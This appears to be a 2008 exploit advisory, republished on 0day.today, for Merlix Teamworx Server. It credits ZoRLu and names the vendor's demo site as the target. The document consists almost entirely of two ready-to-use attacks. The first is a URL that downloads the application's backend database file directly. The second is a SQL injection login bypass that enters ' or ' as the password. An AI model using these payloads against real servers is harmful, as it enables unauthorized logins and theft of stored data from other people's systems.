id: 4360
date: 12/05/2008
title: Merlix Teamworx Server (DD/Bypass) Multiple Remote Vulns
author: ZoRLu
cves: 

========================================================
Merlix Teamworx Server (DD/Bypass) Multiple Remote Vulns
========================================================


[~] Merlix Teamworx Server DD/Bypass Multiple Remote Vuln.
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------


exp for demo: ( DD )

http://demo.merlix.com/teamworx/teamworx.mdb

exp for demo: ( Bypass )

http://demo.merlix.com/teamworx/default.asp

user: ZoRLu ( or dont write anything )

passwd: ' or '

[~]----------------------------------------------------------------------



#  0day.today [2023-03-24]  #